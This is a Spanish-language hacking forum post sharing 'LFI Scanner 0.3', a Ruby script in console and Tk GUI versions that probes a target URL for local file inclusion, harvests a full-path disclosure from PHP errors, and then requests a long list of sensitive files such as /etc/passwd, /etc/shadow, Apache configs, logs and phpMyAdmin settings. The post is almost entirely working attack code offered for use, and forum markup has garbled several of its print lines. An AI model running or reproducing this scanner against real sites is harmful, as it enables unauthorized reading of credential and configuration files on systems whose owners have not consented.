[Ruby] LFI Scanner 0.3

  • 0 Respuestas
  • 3941 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil

[Ruby] LFI Scanner 0.3

  • en: Agosto 21, 2015, 06:39:32 pm
Un simple script en Ruby para scannear la vulnerabilidad LFI en una pagina.

Version consola :

Código: Ruby
  1. #!usr/bin/ruby
  2. #LFI Scanner 0.3
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"  
  7.  
  8. # Functions
  9.  
  10. def toma(web)
  11.    begin
  12.       return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  13.    rescue
  14.       return "Error"
  15.    end
  16. end
  17.  
  18. def uso
  19.    print "\n<ul class="bbc_list"><li type="square"> Sintax : ruby lfi.rb <page>\n"[/li][/list]
  20. end
  21.  
  22. def  head
  23.    print "\n\n-- == LFI Scanner 0.3 == --\n\n"
  24. end
  25.  
  26. def copyright
  27.    print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  28.    exit(1)
  29. end
  30.  
  31. def scan(web)
  32.    files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
  33.    print "\n</li><li type="square"> Testing the vulnerability LFI...\n\n"[/li][/list]
  34.    code = toma(web+"'")
  35.    if code=~/No such file or directory in <b>(.*)<\/b> on line/
  36.       fpd = $1
  37.       print "</li><li type="square"> LFI Detected\n\n"[/li][/list]
  38.       print "[Full Path Discloure]: "+fpd+"\n"
  39.       print "\n</li><li type="square"> Fuzzing Files\n\n"[/li][/list]
  40.       files.each do |file|
  41.          code = toma(web+file)
  42.          if not code=~/No such file or directory in/
  43.             print "[Link] : "+web+file+"\n"
  44.          end
  45.       end
  46.       print "\n</li><li type="square"> Finish\n"[/li][/list]
  47.       copyright()
  48.    else
  49.       print "[-] Not Vulnerable to LFI\n\n"
  50.    end
  51. end
  52.  
  53. #
  54.  
  55. page = ARGV[0]
  56.  
  57. head()
  58.  
  59. if !page
  60.    uso()
  61. else
  62.    scan(page)
  63. end
  64.  
  65. copyright()
  66.  
  67. #The End ?
  68.  

Version Tk :

Código: Ruby
  1. #!usr/bin/ruby
  2. #LFI Scanner 0.3
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "net/http"
  7. require "open-uri"
  8.  
  9. # Functions
  10.  
  11. def toma(web)
  12.    begin
  13.       return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  14.    rescue
  15.       return "Error"
  16.    end
  17. end
  18.  
  19. #
  20.  
  21. window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
  22. window['geometry'] = '300x300-20+10'
  23.  
  24. TkLabel.new(window) do
  25.    background "black"
  26.    foreground "cyan"
  27.    text "    Target : "
  28.    place('relx'=>"0.1",'rely'=>"0.1")
  29. end
  30.  
  31. web= TkEntry.new(window){
  32.    background "black"
  33.    foreground "cyan"
  34.    width 25
  35.    place('relx'=>0.3,'rely'=>0.1)
  36. }
  37.  
  38. TkLabel.new(window) do
  39.    background "black"
  40.    foreground "cyan"
  41.    text "Console"
  42.    place('relx'=>0.4,'rely'=>0.2)
  43. end
  44.  
  45. console =TkText.new(window) do
  46.    background "black"
  47.    foreground "cyan"
  48.    width 30
  49.    height 10
  50.    place('relx'=>0.1,'rely'=>0.3)
  51. end
  52.  
  53. TkButton.new(window) do
  54.    text "Search"
  55.     background "black"
  56.    foreground "cyan"
  57.    width 17
  58.    activebackground "cyan"
  59.    highlightbackground  "cyan"
  60.    command proc{
  61.       web = web.value.to_s
  62.       files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
  63.       console.insert("end", "</li><li type="square"> Testing the vulnerability LFI...\n\n")[/li][/list]
  64.       code = toma(web+"'")
  65.       if code=~/No such file or directory in <b>(.*)<\/b> on line/
  66.          fpd = $1
  67.          console.insert("end","</li><li type="square"> LFI Detected\n\n")[/li][/list]
  68.          console.insert("end","[Full Path Discloure]: "+fpd+"\n")
  69.          console.insert("end","\n</li><li type="square"> Fuzzing Files\n\n")[/li][/list]
  70.          files.each do |file|
  71.          code = toma(web+file)
  72.          if not code=~/No such file or directory in/
  73.             console.insert("end","[Link] : "+web+file+"\n")
  74.          end
  75.       end
  76.       console.insert("end","\n</li><li type="square"> Finish")[/li][/list]
  77.       else
  78.          console.insert("end","[-] Not Vulnerable to LFI")
  79.       end
  80.    }
  81.    place('relx'=>0.3,'rely'=>0.9)
  82. end
  83.  
  84. Tk.mainloop
  85.  
  86. #The End ?
  87.  

Una imagen :



Eso es todo.
« Última modificación: Agosto 21, 2015, 10:00:31 pm por EPSILON »

 

[Ruby] Traductor de Decimal a Ascii / Ascii a Decimal

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2853
Último mensaje Febrero 24, 2010, 04:16:38 pm
por ANTRAX
Lenguaje Ruby, aprendiendo poco a poco.

Iniciado por Alejandro_99

Respuestas: 2
Vistas: 3161
Último mensaje Agosto 15, 2013, 02:58:39 pm
por Alejandro_99
Crafting rails 4 applications (Manual de Ruby on Rails 4)

Iniciado por Alejandro_99

Respuestas: 0
Vistas: 1997
Último mensaje Marzo 01, 2014, 05:34:50 pm
por Alejandro_99
Desarrollo de aplicaciones Perl, PHP, Python y "Ruby on Rails"

Iniciado por Alejandro_99

Respuestas: 0
Vistas: 2475
Último mensaje Junio 13, 2014, 03:27:08 pm
por Alejandro_99
Shoesrb donde puedes hacerle una interfaz grafica a una aplicación hecha en Ruby

Iniciado por Alejandro_99

Respuestas: 3
Vistas: 3550
Último mensaje Mayo 21, 2013, 03:51:00 am
por StuXn3t